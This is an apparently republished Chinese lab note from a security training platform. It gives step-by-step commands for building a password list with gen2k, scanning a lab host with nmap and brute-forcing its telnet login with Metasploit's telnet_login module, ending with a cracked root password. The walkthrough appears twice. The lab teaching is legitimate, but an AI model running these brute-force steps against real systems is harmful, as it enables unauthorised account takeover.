实验吧笔记-Metasploit批量验证爆破telnet
来源:互联网 发布:阿里云音视频 编辑:程序博客网 时间:2024/06/05 02:32
Metasploit批量验证爆破telnet
实验原理:
1) 利用gen2k工具,根据收集来的信息,自动生成密码,使用枚举的方法破解telnet登陆密码。
实验步骤:
一、利用gen2k工具生成密码表
1.1 使用gen2k工具生成密码表。单击桌面空白处,右键菜单选择“在终端中打开”
1.2 在终端中输入命令“cd /home”,进入软件目录,在终端中输入命令“more user.txt”,查看已收集到的关键词文件“user.txt”,利用此文件生成对应的密码
1.3 在终端中输入命令“python gen2k.py -n -y -z -e -c -w user.txt -o passwd.txt”,生成密码文件passwd.txt,在终端下输入命令“more passwd.txt”,查看生成的内容
二、利用Metasploit暴破目标主机telnet服务
2.1 在终端中输入命令“nmap –sV 192.168.1.3”,扫描目标主机,发现目标主机开启telnet服务
2.2 在终端中输入命令“msfconsole”,启动MSF终端
2.3 在终端中输入命令“search telnet”,搜索telnet的相关工具和攻击载荷
2.4 在终端中输入命令“use auxiliary/scanner/telnet/telnet_login”,启用漏洞利用模块, 提示符就会提示进入到该路径下
2.5 在终端中输入命令“set RHOSTS 192.168.1.3”,设置目标主机的IP地址。
2.6 在终端中输入命令“set PASS_FILE /home/passwd.txt”,爆破时使用的密码文件为passwd.txt。
2.7 在终端中输入命令“set USER_FILE /home/user.txt”,爆破时使用的用户名文件为user.txt。
2.8 在终端中输入“exploit 192.168.1.3”, 对目标主机进行暴力破解。
2.9 拆解到密码
2.10 在终端中输入“telnet 192.168.1.3 ”,输入获取的账号root和密码Simplexue123,连接成功。
实验原理:
1) 利用gen2k工具,根据收集来的信息,自动生成密码,使用枚举的方法破解telnet登陆密码。
实验步骤:
一、利用gen2k工具生成密码表
1.1 使用gen2k工具生成密码表。单击桌面空白处,右键菜单选择“在终端中打开”
1.2 在终端中输入命令“cd /home”,进入软件目录,在终端中输入命令“more user.txt”,查看已收集到的关键词文件“user.txt”,利用此文件生成对应的密码
1.3 在终端中输入命令“python gen2k.py -n -y -z -e -c -w user.txt -o passwd.txt”,生成密码文件passwd.txt,在终端下输入命令“more passwd.txt”,查看生成的内容
二、利用Metasploit暴破目标主机telnet服务
2.1 在终端中输入命令“nmap –sV 192.168.1.3”,扫描目标主机,发现目标主机开启telnet服务
2.2 在终端中输入命令“msfconsole”,启动MSF终端
2.3 在终端中输入命令“search telnet”,搜索telnet的相关工具和攻击载荷
2.4 在终端中输入命令“use auxiliary/scanner/telnet/telnet_login”,启用漏洞利用模块, 提示符就会提示进入到该路径下
2.5 在终端中输入命令“set RHOSTS 192.168.1.3”,设置目标主机的IP地址。
2.6 在终端中输入命令“set PASS_FILE /home/passwd.txt”,爆破时使用的密码文件为passwd.txt。
2.7 在终端中输入命令“set USER_FILE /home/user.txt”,爆破时使用的用户名文件为user.txt。
2.8 在终端中输入“exploit 192.168.1.3”, 对目标主机进行暴力破解。
2.9 拆解到密码
2.10 在终端中输入“telnet 192.168.1.3 ”,输入获取的账号root和密码Simplexue123,连接成功。
阅读全文
0 0
- 实验吧笔记-Metasploit批量验证爆破telnet
- 实验吧笔记-Metasploit对目标主机SSH爆破
- 实验吧笔记-Metasploit爆破Tomcat弱口令
- Metasploit笔记
- Metasploit笔记
- Metasploit笔记
- Discuz爆破无视验证码
- 爆破脚本+过验证码
- Python MySQL批量爆破工具多线程版
- Metasploit渗透测试实验报告
- DVWA实验----使用burpsuite登录爆破
- ftp telnet 自动批量
- 爆破吧~2015
- 爆破。
- Metasploit 学习笔记
- Metasploit 整理笔记
- Metasploit 整理笔记
- Metasploit Nessus、Nexpose笔记
- 小结-171117
- 数据库
- 本周感悟
- seo揭秘:关键词如何批量优化
- 每天一个linux命令(13):less 命令
- 实验吧笔记-Metasploit批量验证爆破telnet
- NativeCrashListener,安卓系统AOSP源码
- seaborn在pycharm中绘图不出图原因
- fseek函数
- jsp/servlet第五章第四节exception对象
- 使用HTMLTestRunner生产报告
- Android | ListView 、GridView 和 RecyclerView 概述
- android 问题记录
- 机器学习基石-10-1-Logistic Regression Problem